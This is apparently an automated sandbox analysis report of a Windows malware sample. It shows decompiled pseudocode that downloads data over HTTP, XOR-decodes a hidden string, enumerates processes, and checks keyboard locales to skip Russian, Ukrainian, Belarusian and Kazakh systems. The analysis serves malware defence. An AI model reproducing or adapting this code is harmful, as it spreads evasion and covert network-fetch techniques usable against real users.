											_t308 = InternetConnectA(_t443,  >=  ? _v80 :  &_v80, 0x50,  *(_t341 + 0x3c),  *(_t341 + 0x40), 3, 0, 1);
											_t437 = InternetCloseHandle;
											_t344 = _t308;
											__eflags = _t344;
											if(_t344 != 0) {
												__eflags = _v32 - 0x10;
												_t395 =  >=  ? _v52 :  &_v52;
												_t447 = HttpOpenRequestA(_t344, "GET",  >=  ? _v52 :  &_v52, 0, 0, 0, 0x80400000, 1);
												__eflags = _t447;
												if(__eflags != 0) {
													E004012E0(_t344, InternetCloseHandle, __eflags, _t447);
													_t313 = HttpSendRequestA(_t447, 0, 0, 0, 0);
													__eflags = _t313;
													if(_t313 != 0) {
														_v88 = E00401420(_t344, _v84, InternetCloseHandle, _t447);
													}
													 *_t437(_t447);
												}
												 *_t437(_t344);
												_t443 = _v92;
											}
											 *_t437(_t443);
										}
										_t418 = _v60;
										__eflags = _v88;
										_t338 = 0 | _v88 > 0x00000000;
										__eflags = _t418 - 0x10;
										if(_t418 < 0x10) {
											L55:
											_t419 = _v32;
											_v64 = 0;
											_v60 = 0xf;
											_v80 = 0;
											__eflags = _t419 - 0x10;
											if(_t419 < 0x10) {
												L59:
												 *[fs:0x0] = _v20;
												_pop(_t436);
												_pop(_t444);
												_pop(_t343);
												__eflags = _v28 ^ _t452;
												return E0040D3AF(_t338, _t343, _v28 ^ _t452, _t419, _t436, _t444);
											} else {
												_t391 = _v52;
												_t419 = _t419 + 1;
												_t294 = _t391;
												__eflags = _t419 - 0x1000;
												if(_t419 < 0x1000) {
													L58:
													_push(_t419);
													E0040D5EF(_t391);
													goto L59;
												} else {
													_t391 =  *((intOrPtr*)(_t391 - 4));
													_t419 = _t419 + 0x23;
													__eflags = _t294 - _t391 + 0xfffffffc - 0x1f;
													if(__eflags > 0) {
														goto L61;
													} else {
														goto L58;
													}
												}
											}
										} else {
											_t393 = _v80;
											_t420 = _t418 + 1;
											_t300 = _t393;
											__eflags = _t420 - 0x1000;
											if(_t420 < 0x1000) {
												L54:
												_push(_t420);
												E0040D5EF(_t393);
												_t462 = _t462 + 8;
												goto L55;
											} else {
												_t391 =  *((intOrPtr*)(_t393 - 4));
												_t419 = _t420 + 0x23;
												__eflags = _t300 - _t391 + 0xfffffffc - 0x1f;
												if(__eflags > 0) {
													goto L61;
												} else {
													goto L54;
												}
											}
										}
									} else {
										__eflags = _t443 - _t433;
										if(_t443 < _t433) {
											E00402170(_t381, _t417);
											L61:
											E00411D17(_t338, _t391, _t419, __eflags);
											asm("int3");
											asm("int3");
											asm("int3");
											asm("int3");
											asm("int3");
											asm("int3");
											asm("int3");
											asm("int3");
											asm("int3");
											asm("int3");
											asm("int3");
											asm("int3");
											_push(_t452);
											_push(_t443);
											_t445 = _t391;
											_t299 =  *(_t445 + 0x2c);
											 *(_t445 + 0x34) = 0;
											__eflags = _t299;
											if(_t299 != 0) {
												_t299 = L0040D3BD(_t299);
												 *(_t445 + 0x2c) = 0;
											}
											_push(_v4);
											L34();
											return _t299;
										} else {
											_t319 = _t443 - _t433;
											__eflags = _t319 - 7;
											_t422 =  <  ? _t319 : 7;
											__eflags = _t338 - 0x10;
											_t398 =  >=  ? _v52 :  &_v52;
											_t448 = _t443 - 7;
											_t399 =  &(( >=  ? _v52 :  &_v52)[_t433]);
											_v36 = _t448;
											__eflags = _t448 - _t433 + 1;
											E0040ECB0( &(( >=  ? _v52 :  &_v52)[_t433]),  &(( &(( >=  ? _v52 :  &_v52)[_t433]))[ <  ? _t319 : 7]), _t448 - _t433 + 1);
											_t443 = _v36;
											_t462 = _t462 + 0xc;
											goto L39;
										}
									}
								} else {
									goto L18;
								}
							}
						}
					}
				}
			}

0x00401423
0x00401425
0x00401430
0x00401431
0x00401437
0x0040143c
0x0040143e
0x00401441
0x00401443
0x00401444
0x00401448
0x0040144e
0x00401450
0x00401454
0x00401457
0x0040145d
0x0040148c
0x0040145f
0x00401464
0x0040146b
0x00401470
0x00401473
0x00401476
0x0040147d
0x0040147d
0x0040149b
0x004014a5
0x004014b0
0x004014c4
0x004014ca
0x004014d0
0x004014d2
0x004014d7
0x004014dd
0x004014e3
0x004014eb
0x004014f6
0x004014fe
0x00401506
0x0040150b
0x00401511
0x00401514
0x00401517
0x00401517
0x0040151d
0x00401530
0x0040153d
0x00401542
0x00401560
0x004018c5
0x004018cb
0x004018db
0x004018e3
0x004018e4
0x004018e5
0x004018f3
0x00401566
0x0040156c
0x00401580
0x00401586
0x00401591
0x00401599
0x00000000
0x004015ac
0x004015ac
0x004015b2
0x004015bc
0x004015c6
0x004015c9
0x004015d3
0x004015da
0x004015e0
0x004015e0
0x004015e2
0x004015e3
0x004015ef
0x004015f7
0x004015fc
0x0040160f
0x00401615
0x0040161f
0x0040162e
0x00401638
0x00401649
0x0040164e
0x00401651
0x00401664
0x0040166c
0x0040167a
0x0040167c
0x0040167e
0x0040168a
0x00401694
0x0040169e
0x004016a5
0x004016a5
0x004016b0
0x004016b0
0x004016b3
0x004016b6
0x004016c7
0x004016cd
0x004016d2
0x004016d5
0x004016df
0x004016f3
0x00401703
0x00401706
0x0040170a
0x0040170c
0x00401715
0x0040174c
0x0040174e
0x00401755
0x0040175b
0x00401765
0x0040176f
0x00401779
0x004017aa
0x004017ac
0x004017b2
0x004017b9
0x004017cf
0x004017d2
0x004017dd
0x004017e3
0x004017e9
0x004017f3
0x004017f5
0x004017ff
0x00401807
0x0040180e
0x00401814
0x00401815
0x0040181b
0x0040181c
0x00401820
0x00401821
0x00401829
0x0040182a
0x0040182b
0x0040182d
0x00401833
0x00401835
0x0040183b
0x0040183e
0x00401841
0x00401843
0x0040187d
0x00401845
0x0040184c
0x00401857
0x0040185f
0x00401867
0x0040186c
0x0040186f
0x00401872
0x00401878
0x00401878
0x00401887
0x0040188c
0x00401897
0x0040189c
0x0040189c
0x004018a5
0x004018aa
0x004018b6
0x004018b6
0x004017b9
0x004018b9
0x004018c2
0x00000000
0x0040177b
0x0040177b
0x00401781
0x00401782
0x0040178a
0x004017a0
0x004017a0
0x004017a2
0x004017a7
0x00000000
0x0040178c
0x0040178c
0x0040178f
0x0040179a
0x00000000
0x00000000
0x00000000
0x00000000
0x0040179a
0x0040178a
0x00401717
0x00401717
0x0040171d
0x00401724
0x0040172c
0x00401742
0x00401742
0x00401744
0x00401749
0x00000000
0x0040172e
0x0040172e
0x00401731
0x0040173c
0x004018f6
0x004018f6
0x004018fb
0x004018fc
0x004018fd
0x004018fe
0x004018ff
0x00401900
0x00401901
0x00401903
0x00401905
0x00401910
0x00401911
0x00401919
0x00401919
0x0040191b
0x0040191e
0x0040191f
0x00401920
0x00401921
0x00401925
0x0040192b
0x0040192e
0x00401931
0x00401933
0x0040193a
0x0040193d
0x00401944
0x0040194b
0x0040194e
0x00401952
0x00401952
0x00401954
0x00401955
0x00401955
0x0040195b
0x00401960
0x00401965
0x0040196f
0x00401972
0x00401975
0x00401978
0x0040197a
0x0040198b
0x0040198d
0x00401990
0x00401993
0x004019d0
0x004019d0
0x004019d7
0x004019db
0x004019dd
0x004019f5
0x004019f5
0x004019f5
0x004019df
0x004019e8
0x004019ea
0x004019ed
0x004019ef
0x00000000
0x004019f1
0x004019f1
0x004019f1
0x004019ef
0x004019f8
0x004019fa
0x00401a03
0x00401a0a
0x00401a0d
0x00401a14
0x00401a1b
0x00401a1c
0x00401a24
0x00401a28
0x00401a2d
0x00401a34
0x00401a37
0x00401a39
0x00401a3c
0x00401a40
0x00401a44
0x00401a46
0x00401a50
0x00401a55
0x00401a5b
0x00401a73
0x00401a7b
0x00401a85
0x00401a94
0x00401a96
0x00401a99
0x00401a9b
0x00401aa6
0x00401ab1
0x00401ab7
0x00401ac0
0x00401ad2
0x00401ad8
0x00401ade
0x00401ae0
0x00401ae2
0x00401ae4
0x00401aed
0x00401b09
0x00401b0b
0x00401b0d
0x00401b10
0x00401b1e
0x00401b24
0x00401b26
0x00401b31
0x00401b31
0x00401b35
0x00401b35
0x00401b38
0x00401b3a
0x00401b3a
0x00401b3e
0x00401b3e
0x00401b40
0x00401b45
0x00401b48
0x00401b4b
0x00401b4e
0x00401b78
0x00401b78
0x00401b7b
0x00401b82
0x00401b89
0x00401b8d
0x00401b90
0x00401bba
0x00401bbf
0x00401bc7
0x00401bc8
0x00401bc9
0x00401bcd
0x00401bd7
0x00401b92
0x00401b92
0x00401b95
0x00401b96
0x00401b98
0x00401b9e
0x00401bb0
0x00401bb0
0x00401bb2
0x00000000
0x00401ba0
0x00401ba0
0x00401ba3
0x00401bab
0x00401bae
0x00000000
0x00000000
0x00000000
0x00000000
0x00401bae
0x00401b9e
0x00401b50
0x00401b50
0x00401b53
0x00401b54
0x00401b56
0x00401b5c
0x00401b6e
0x00401b6e
0x00401b70
0x00401b75
0x00000000
0x00401b5e
0x00401b5e
0x00401b61
0x00401b69
0x00401b6c
0x00000000
0x00000000
0x00000000
0x00000000
0x00401b6c
0x00401b5c
0x00401995
0x00401995
0x00401997
0x00401bda
0x00401bdf
0x00401bdf
0x00401be4
0x00401be5
0x00401be6
0x00401be7
0x00401be8
0x00401be9
0x00401bea
0x00401beb
0x00401bec
0x00401bed
0x00401bee
0x00401bef
0x00401bf0
0x00401bf3
0x00401bf4
0x00401bf6
0x00401bf9
0x00401c00
0x00401c02
0x00401c05
0x00401c0d
0x00401c0d
0x00401c14
0x00401c19
0x00401c20
0x0040199d
0x004019a2
0x004019a9
0x004019ab
0x004019ae
0x004019b1
0x004019b5
0x004019b7
0x004019b9
0x004019be
0x004019c5
0x004019ca
0x004019cd
0x00000000
0x004019cd
0x00401997
0x00000000
0x00000000
0x00000000
0x0040173c
0x0040172c
0x00401715
0x00401599

APIs

InternetSetFilePointer.WININET(?,00000000,00000000,00000000,00000000), ref: 004014A5
InternetReadFile.WININET(?,00000000,000003E8,00000000), ref: 004014C4

Strings

text, xrefs: 004016FC

Memory Dump Source

Source File: 00000000.00000002.323104838.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_qjrOWCCE58.jbxd

Yara matches

Similarity

API ID: FileInternet$PointerRead
String ID: text
API String ID: 3197321146-999008199
Opcode ID: 3efb4df0ae816ce63a11086eca214c56c3d3f34948d4aad85d3f0e8a20c2a6e3
Instruction ID: a953e81693c2fa53e6eb4fd86f28736d244d15349d1f069f5ba6cdc04a6060d8
Opcode Fuzzy Hash: 3efb4df0ae816ce63a11086eca214c56c3d3f34948d4aad85d3f0e8a20c2a6e3
Instruction Fuzzy Hash: 25C18A71A002189FEB25DF24CD85BEAB7B5FF48304F1041AEE509A72A1DB75AE84CF54

Uniqueness

Uniqueness Score: -1.00%

Function 00404620 Relevance: 10.9, APIs: 3, Strings: 3, Instructions: 368
COMMONCrypto

Download Yara Rule

C-Code - Quality: 63%

			E00404620(void* __ebx, int* __ecx) {
				intOrPtr _v8;
				int _v16;
				char _v20;
				signed int _v24;
				intOrPtr _v28;
				signed int _v32;
				char _v36;
				char _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				signed int _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				long _v64;
				char _v80;
				char _v81;
				signed int _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				long _v100;
				int _v104;
				int _v120;
				char _v284;
				char _v288;
				char _v292;
				char _v540;
				struct HKL__* _v1564;
				int* _v1568;
				int _v1572;
				int _v1576;
				int _v1580;
				long _v1584;
				int _v1588;
				int _v1604;
				int* _v1608;
				intOrPtr _v1632;
				char _v1640;
				signed int _v1644;
				intOrPtr _v1656;
				intOrPtr _v1660;
				signed int _v1664;
				intOrPtr _v1700;
				intOrPtr _v1704;
				signed int _v1756;
				char _v2006;
				short _v2008;
				int* _v2024;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t130;
				signed int _t131;
				int _t134;
				int _t137;
				intOrPtr* _t139;
				intOrPtr _t143;
				int _t145;
				signed int _t151;
				signed int _t152;
				intOrPtr _t155;
				intOrPtr _t164;
				signed int _t170;
				short _t172;
				signed int _t177;
				signed int _t183;
				intOrPtr _t188;
				signed char _t189;
				signed char* _t190;
				void* _t195;
				long _t196;
				intOrPtr _t197;
				intOrPtr _t198;
				intOrPtr _t202;
				intOrPtr _t203;
				intOrPtr _t204;
				int _t208;
				void* _t212;
				signed int _t213;
				void* _t220;
				signed int _t222;
				int _t223;
				void* _t224;
				intOrPtr _t232;
				int _t234;
				int _t237;
				signed int* _t238;
				signed int _t248;
				intOrPtr* _t249;
				signed int _t255;
				long _t259;
				void* _t260;
				void* _t264;
				signed char* _t265;
				signed int _t267;
				void* _t268;
				signed int _t269;
				void* _t270;
				int* _t271;
				void* _t272;
				int* _t274;
				void* _t275;
				void* _t276;
				signed int _t277;
				void* _t279;
				void* _t280;
				intOrPtr _t281;
				signed int _t284;
				signed int _t286;
				signed int _t288;
				void* _t290;
				signed int _t293;
				signed int _t294;
				void* _t297;
				signed int _t299;

				_push(__ebx);
				_t220 = _t290;
				_t293 = (_t290 - 0x00000008 & 0xfffffff8) + 4;
				_v8 =  *((intOrPtr*)(_t220 + 4));
				_t284 = _t293;
				_push(0xffffffff);
				_push(0x42ad42);
				_push( *[fs:0x0]);
				_push(_t220);
				_t294 = _t293 - 0x630;
				_t130 =  *0x43b054; // 0x41d6575c
				_t131 = _t130 ^ _t284;
				_v32 = _t131;
				_push(_t131);
				 *[fs:0x0] =  &_v24;
				_t274 = __ecx;
				_v1568 = __ecx;
				_v1608 = __ecx;
				asm("xorps xmm0, xmm0");
				_v1572 = 0;
				asm("movq [esi], xmm0");
				__ecx[2] = 0;
				 *__ecx = 0;
				__ecx[1] = 0;
				__ecx[2] = 0;
				_v16 = 0;
				_v1572 = 1;
				_t134 = GetKeyboardLayoutList(0x400,  &_v1564);
				_t267 = 0;
				_v1568 = _t134;
				if(_t134 <= 0) {
					L12:
					 *[fs:0x0] = _v24;
					_pop(_t268);
					_pop(_t275);
					return E0040D3AF(_t274, _t220, _v32 ^ _t284, _t259, _t268, _t275);
				} else {
					do {
						_t137 =  *(_t284 + _t267 * 4 - 0x610) & 0x0000ffff;
						_v1576 = _t137;
						GetLocaleInfoA(_t137, 2,  &_v540, 0x1f4);
						_t139 =  &_v540;
						_v1604 = 0;
						_v1588 = 0;
						_t260 = _t139 + 1;
						_v1584 = 0xf;
						_v1604 = 0;
						do {
							_t232 =  *_t139;
							_t139 = _t139 + 1;
						} while (_t232 != 0);
						_push(_t139 - _t260);
						E00402030( &_v1604,  &_v540);
						_t234 = _v1576;
						_v1580 = _t234;
						_v16 = 1;
						_t143 =  *((intOrPtr*)(_t274 + 4));
						if(_t143 ==  *((intOrPtr*)(_t274 + 8))) {
							_push( &_v1604);
							_push(_t143);
							E0040B430(_t220, _t274, _t267, _t274);
							_t259 = _v1584;
						} else {
							asm("movups xmm0, [ebp-0x638]");
							_t259 = 0xf;
							_v1604 = 0;
							asm("movups [eax], xmm0");
							asm("movq xmm0, [ebp-0x628]");
							asm("movq [eax+0x10], xmm0");
							 *(_t143 + 0x18) = _t234;
							 *((intOrPtr*)(_t274 + 4)) =  *((intOrPtr*)(_t274 + 4)) + 0x1c;
						}
						_v16 = 0;
						if(_t259 < 0x10) {
							goto L11;
						} else {
							_t237 = _v1604;
							_t259 = _t259 + 1;
							_t145 = _t237;
							if(_t259 < 0x1000) {
								L10:
								_push(_t259);
								E0040D5EF(_t237);
								_t294 = _t294 + 8;
								goto L11;
							} else {
								_t237 =  *(_t237 - 4);
								_t259 = _t259 + 0x23;
								if(_t145 - _t237 + 0xfffffffc > 0x1f) {
									E00411D17(_t220, _t237, _t259, __eflags);
									asm("int3");
									_push(_t284);
									_t286 = _t294;
									_push(0xffffffff);
									_push(0x42ad85);
									_push( *[fs:0x0]);
									_t297 = _t294 - 0x5c;
									_t151 =  *0x43b054; // 0x41d6575c
									_t152 = _t151 ^ _t286;
									_v1644 = _t152;
									_push(_t220);
									_push(_t274);
									_push(_t267);
									_push(_t152);
									 *[fs:0x0] =  &_v1640;
									_t222 = 0;
									_t238 =  &_v1664;
									asm("xorps xmm0, xmm0");
									_v1700 = 0;
									asm("movq [ebp-0x24], xmm0");
									_v1656 = 0;
									E00404620(0, _t238);
									_v1632 = 0;
									_t155 = _v1660;
									_t269 = _v1664;
									_v1704 = _t155;
									__eflags = _t269 - _t155;
									if(_t269 == _t155) {
										L41:
										_t223 = 0;
										__eflags = 0;
										goto L42;
									} else {
										_v40 = 0x5d5d5b7c;
										_v36 = 0x2e404f47;
										_t281 =  *((intOrPtr*)( *[fs:0x2c]));
										_v96 = _t281;
										do {
											E0040A490(_t222,  &_v80, _t259, _t269, _t269);
											_v56 =  *((intOrPtr*)(_t269 + 0x18));
											_v20 = 1;
											_t188 =  *0x43ce9c; // 0x0
											__eflags = _t188 -  *((intOrPtr*)(_t281 + 4));
											if(_t188 >  *((intOrPtr*)(_t281 + 4))) {
												E0040D738(_t188, 0x43ce9c);
												_t297 = _t297 + 4;
												__eflags =  *0x43ce9c - 0xffffffff;
												if(__eflags == 0) {
													_t62 =  &_v40; // 0x5d5d5b7c
													 *0x43ce6c =  *_t62;
													_t63 =  &_v36; // 0x2e404f47
													 *0x43ce70 =  *_t63;
													E0040DA4A( &_v80, __eflags, 0x42b510);
													E0040D6EE(0x43ce9c);
													_t297 = _t297 + 8;
												}
											}
											_t189 =  *0x43ce73; // 0x0
											__eflags = _t189;
											if(_t189 != 0) {
												 *0x43ce6c =  *0x43ce6c ^ 0x0000002e;
												 *0x43ce6d =  *0x43ce6d ^ 0x0000002e;
												 *0x43ce6e =  *0x43ce6e ^ 0x0000002e;
												 *0x43ce6f =  *0x43ce6f ^ 0x0000002e;
												 *0x43ce70 =  *0x43ce70 ^ 0x0000002e;
												 *0x43ce71 =  *0x43ce71 ^ 0x0000002e;
												 *0x43ce72 =  *0x43ce72 ^ 0x0000002e;
												_t213 = _t189 ^ 0x0000002e;
												__eflags = _t213;
												 *0x43ce73 = _t213;
											}
											_t190 = 0x43ce6c;
											_v120 = 0;
											_v104 = 0;
											_v100 = 0xf;
											_t67 =  &(_t190[1]); // 0x43ce6d
											_t265 = _t67;
											do {
												_t255 =  *_t190;
												_t190 =  &(_t190[1]);
												__eflags = _t255;
											} while (_t255 != 0);
											_push(_t190 - _t265);
											E00402030( &_v120, 0x43ce6c);
											_t274 = _v80;
											_t259 = _v64;
											__eflags = _v100 - 0x10;
											_v88 = _t222 | 0x00000001;
											_t223 = _v120;
											_t194 =  >=  ? _t223 :  &_v120;
											__eflags = _v60 - 0x10;
											_t238 =  >=  ? _t274 :  &_v80;
											_t195 = E00402180(_t238, _t259, _t238,  >=  ? _t223 :  &_v120, _v104);
											_t297 = _t297 + 0xc;
											__eflags = _t195 - 0xffffffff;
											if(_t195 != 0xffffffff) {
												L25:
												_v81 = 1;
											} else {
												__eflags = _v60 - 0x10;
												_t259 = _v64;
												_t238 =  >=  ? _t274 :  &_v80;
												_t212 = E00402180(_t238, _t259, _t238, 0x437a5c, 7);
												_t297 = _t297 + 0xc;
												_v81 = 0;
												__eflags = _t212 - 0xffffffff;
												if(_t212 != 0xffffffff) {
													goto L25;
												}
											}
											_v88 = _v88 & 0xfffffffe;
											_t196 = _v100;
											__eflags = _t196 - 0x10;
											if(_t196 < 0x10) {
												L30:
												__eflags = _v81;
												if(_v81 != 0) {
													L46:
													_t197 = _v60;
													__eflags = _t197 - 0x10;
													if(_t197 < 0x10) {
														L50:
														_t269 = _v52;
														_t223 = 1;
														L42:
														__eflags = _t269;
														if(_t269 == 0) {
															L52:
															 *[fs:0x0] = _v28;
															_pop(_t270);
															_pop(_t276);
															_pop(_t224);
															__eflags = _v32 ^ _t286;
															return E0040D3AF(_t223, _t224, _v32 ^ _t286, _t259, _t270, _t276);
														} else {
															_push(_t238);
															E0040BB70(_t223, _t269, _v48, _t269, _t274);
															_t277 = _v52;
															_t299 = _t297 + 4;
															_t259 = (0x92492493 * (_v44 - _t277) >> 0x20) + _v44 - _t277 >> 4;
															_t164 = _t277;
															_t248 = ((_t259 >> 0x1f) + _t259) * 8 - (_t259 >> 0x1f) + _t259 << 2;
															__eflags = _t248 - 0x1000;
															if(_t248 < 0x1000) {
																L51:
																_push(_t248);
																E0040D5EF(_t277);
																goto L52;
															} else {
																_t277 =  *((intOrPtr*)(_t277 - 4));
																_t248 = _t248 + 0x23;
																__eflags = _t164 - _t277 + 0xfffffffc - 0x1f;
																if(__eflags > 0) {
																	E00411D17(_t223, _t248, _t259, __eflags);
																	goto L54;
																} else {
																	goto L51;
																}
															}
														}
													} else {
														_t109 = _t197 + 1; // 0x11
														_t238 = _t109;
														_t198 = _t274;
														__eflags = _t238 - 0x1000;
														if(_t238 < 0x1000) {
															L49:
															_push(_t238);
															E0040D5EF(_t274);
															_t297 = _t297 + 8;
															goto L50;
														} else {
															_t277 =  *((intOrPtr*)(_t274 - 4));
															_t248 = _t238 + 0x23;
															__eflags = _t198 - _t277 + 0xfffffffc - 0x1f;
															if(__eflags > 0) {
																goto L54;
															} else {
																goto L49;
															}
														}
													}
												} else {
													_t202 = _v56;
													__eflags = _t202 - 0x419;
													if(_t202 == 0x419) {
														goto L46;
													} else {
														__eflags = _t202 - 0x422;
														if(_t202 == 0x422) {
															goto L46;
														} else {
															__eflags = _t202 - 0x423;
															if(_t202 == 0x423) {
																goto L46;
															} else {
																__eflags = _t202 - 0x43f;
																if(_t202 == 0x43f) {
																	goto L46;
																} else {
																	_v20 = 0;
																	_t203 = _v60;
																	__eflags = _t203 - 0x10;
																	if(_t203 < 0x10) {
																		goto L39;
																	} else {
																		_t93 = _t203 + 1; // 0x11
																		_t238 = _t93;
																		_t204 = _t274;
																		__eflags = _t238 - 0x1000;
																		if(_t238 < 0x1000) {
																			L38:
																			_push(_t238);
																			E0040D5EF(_t274);
																			_t297 = _t297 + 8;
																			goto L39;
																		} else {
																			_t277 =  *((intOrPtr*)(_t274 - 4));
																			_t248 = _t238 + 0x23;
																			__eflags = _t204 - _t277 + 0xfffffffc - 0x1f;
																			if(__eflags > 0) {
																				goto L54;
																			} else {
																				goto L38;
																			}
																		}
																	}
																}
															}
														}
													}
												}
											} else {
												_t86 = _t196 + 1; // 0x11
												_t238 = _t86;
												_t208 = _t223;
												__eflags = _t238 - 0x1000;
												if(_t238 < 0x1000) {
													L29:
													_push(_t238);
													E0040D5EF(_t223);
													_t274 = _v80;
													_t297 = _t297 + 8;
													goto L30;
												} else {
													_t223 =  *(_t223 - 4);
													_t248 = _t238 + 0x23;
													__eflags = _t208 - _t223 + 0xfffffffc - 0x1f;
													if(__eflags > 0) {
														L54:
														E00411D17(_t223, _t248, _t259, __eflags);
														asm("int3");
														asm("int3");
														_push(_t286);
														_t288 = _t299;
														_t170 =  *0x43b054; // 0x41d6575c
														_v1756 = _t170 ^ _t288;
														_push(_t277);
														_push(_t269);
														_t271 = _t248;
														_v2024 = _t271;
														_v2024 = _t271;
														_t172 =  *0x437a6c; // 0x3e
														asm("movq xmm0, [0x437a64]");
														_v2008 = _t172;
														asm("movq [ebp-0x108], xmm0");
														E0040F2F0(_t271,  &_v2006, 0, 0xfa);
														_t279 = OpenProcess(0x410, 0, _t259);
														__eflags = _t279;
														if(_t279 != 0) {
															_t183 =  &_v292;
															__imp__K32EnumProcessModules(_t279, _t183, 4,  &_v288); // executed
															__eflags = _t183;
															if(_t183 != 0) {
																__imp__K32GetModuleBaseNameA(_t279, _v292,  &_v284, 0x104); // executed
															}
														}
														FindCloseChangeNotification(_t279); // executed
														_t249 =  &_v284;
														 *_t271 = 0;
														_t271[4] = 0;
														_t264 = _t249 + 1;
														_t271[5] = 0xf;
														 *_t271 = 0;
														do {
															_t177 =  *_t249;
															_t249 = _t249 + 1;
															__eflags = _t177;
														} while (_t177 != 0);
														_push(_t249 - _t264);
														E00402030(_t271,  &_v284);
														_pop(_t272);
														__eflags = _v24 ^ _t288;
														_pop(_t280);
														return E0040D3AF(_t271, _t223, _v24 ^ _t288, _t264, _t272, _t280);
													} else {
														goto L29;
													}
												}
											}
											goto L61;
											L39:
											_t222 = _v88;
											_t269 = _t269 + 0x1c;
											_t281 = _v96;
											__eflags = _t269 - _v92;
										} while (_t269 != _v92);
										_t269 = _v52;
										goto L41;
									}
								} else {
									goto L10;
								}
							}
						}
						goto L61;
						L11:
						_t267 = _t267 + 1;
					} while (_t267 < _v1568);
					goto L12;
				}
				L61:
			}

0x00404620
0x00404621
0x00404629
0x00404630
0x00404634
0x00404636
0x00404638
0x00404643
0x00404644
0x00404645
0x0040464b
0x00404650
0x00404652
0x00404657
0x0040465b
0x00404661
0x00404663
0x00404669
0x0040466f
0x00404672
0x0040467c
0x00404680
0x00404687
0x0040468d
0x00404694
0x004046a1
0x004046ae
0x004046b8
0x004046be
0x004046c0
0x004046c8
0x004047da
0x004047df
0x004047e7
0x004047e8
0x004047f9
0x004046d0
0x004046d0
0x004046d0
0x004046e7
0x004046ed
0x004046f3
0x004046f9
0x00404703
0x0040470d
0x00404710
0x0040471a
0x00404721
0x00404721
0x00404723
0x00404724
0x00404730
0x00404738
0x0040473d
0x00404743
0x00404749
0x00404750
0x00404756
0x0040478a
0x0040478b
0x0040478e
0x00404793
0x00404758
0x00404758
0x0040475f
0x00404764
0x0040476b
0x0040476e
0x00404776
0x0040477b
0x0040477e
0x0040477e
0x00404799
0x004047a0
0x00000000
0x004047a2
0x004047a2
0x004047a8
0x004047a9
0x004047b1
0x004047c3
0x004047c3
0x004047c5
0x004047ca
0x00000000
0x004047b3
0x004047b3
0x004047b6
0x004047c1
0x004047fa
0x004047ff
0x00404800
0x00404801
0x00404803
0x00404805
0x00404810
0x00404811
0x00404814
0x00404819
0x0040481b
0x0040481e
0x0040481f
0x00404820
0x00404821
0x00404825
0x0040482b
0x0040482d
0x00404830
0x00404833
0x00404836
0x0040483b
0x0040483e
0x00404843
0x00404846
0x00404849
0x0040484c
0x0040484f
0x00404851
0x00404a65
0x00404a65
0x00404a65
0x00000000
0x00404857
0x0040485d
0x00404864
0x0040486b
0x0040486d
0x00404870
0x00404874
0x0040487c
0x0040487f
0x00404883
0x00404888
0x0040488e
0x00404895
0x0040489a
0x0040489d
0x004048a4
0x004048a6
0x004048a9
0x004048ae
0x004048b6
0x004048bb
0x004048c8
0x004048cd
0x004048cd
0x004048a4
0x004048d0
0x004048d5
0x004048d7
0x004048d9
0x004048e0
0x004048e7
0x004048ee
0x004048f5
0x004048fc
0x00404903
0x0040490a
0x0040490a
0x0040490c
0x0040490c
0x00404911
0x00404916
0x0040491d
0x00404924
0x0040492b
0x0040492b
0x00404930
0x00404930
0x00404932
0x00404933
0x00404933
0x0040493c
0x00404942
0x0040494a
0x00404950
0x00404959
0x0040495d
0x00404960
0x00404963
0x00404966
0x0040496b
0x0040496f
0x00404974
0x00404977
0x0040497a
0x004049a2
0x004049a2
0x0040497c
0x0040497c
0x00404983
0x00404988
0x00404991
0x00404996
0x00404999
0x0040499d
0x004049a0
0x00000000
0x00000000
0x004049a0
0x004049a6
0x004049aa
0x004049ad
0x004049b0
0x004049e0
0x004049e0
0x004049e4
0x00404ac0
0x00404ac0
0x00404ac3
0x00404ac6
0x00404aef
0x00404aef
0x00404af2
0x00404a67
0x00404a67
0x00404a69
0x00404b06
0x00404b0b
0x00404b13
0x00404b14
0x00404b15
0x00404b19
0x00404b23
0x00404a6f
0x00404a72
0x00404a75
0x00404a82
0x00404a85
0x00404a8e
0x00404aa1
0x00404aa3
0x00404aa6
0x00404aac
0x00404afc
0x00404afc
0x00404afe
0x00000000
0x00404aae
0x00404aae
0x00404ab1
0x00404ab9
0x00404abc
0x00404b24
0x00000000
0x00404abe
0x00000000
0x00404abe
0x00404abc
0x00404aac
0x00404ac8
0x00404ac8
0x00404ac8
0x00404acb
0x00404acd
0x00404ad3
0x00404ae5
0x00404ae5
0x00404ae7
0x00404aec
0x00000000
0x00404ad5
0x00404ad5
0x00404ad8
0x00404ae0
0x00404ae3
0x00000000
0x00000000
0x00000000
0x00000000
0x00404ae3
0x00404ad3
0x004049ea
0x004049ea
0x004049ed
0x004049f2
0x00000000
0x004049f8
0x004049f8
0x004049fd
0x00000000
0x00404a03
0x00404a03
0x00404a08
0x00000000
0x00404a0e
0x00404a0e
0x00404a13
0x00000000
0x00404a19
0x00404a19
0x00404a1d
0x00404a20
0x00404a23
0x00000000
0x00404a25
0x00404a25
0x00404a25
0x00404a28
0x00404a2a
0x00404a30
0x00404a46
0x00404a46
0x00404a48
0x00404a4d
0x00000000
0x00404a32
0x00404a32
0x00404a35
0x00404a3d
0x00404a40
0x00000000
0x00000000
0x00000000
0x00000000
0x00404a40
0x00404a30
0x00404a23
0x00404a13
0x00404a08
0x004049fd
0x004049f2
0x004049b2
0x004049b2
0x004049b2
0x004049b5
0x004049b7
0x004049bd
0x004049d3
0x004049d3
0x004049d5
0x004049da
0x004049dd
0x00000000
0x004049bf
0x004049bf
0x004049c2
0x004049ca
0x004049cd
0x00404b29
0x00404b29
0x00404b2e
0x00404b2f
0x00404b30
0x00404b31
0x00404b39
0x00404b40
0x00404b43
0x00404b44
0x00404b45
0x00404b49
0x00404b4f
0x00404b55
0x00404b5b
0x00404b68
0x00404b78
0x00404b80
0x00404b96
0x00404b98
0x00404b9a
0x00404ba5
0x00404bad
0x00404bb3
0x00404bb5
0x00404bca
0x00404bca
0x00404bb5
0x00404bd1
0x00404bd7
0x00404bdd
0x00404be3
0x00404bea
0x00404bed
0x00404bf4
0x00404bf7
0x00404bf7
0x00404bf9
0x00404bfa
0x00404bfa
0x00404c06
0x00404c0a
0x00404c14
0x00404c15
0x00404c17
0x00404c20
0x00000000
0x00000000
0x00000000
0x004049cd
0x004049bd
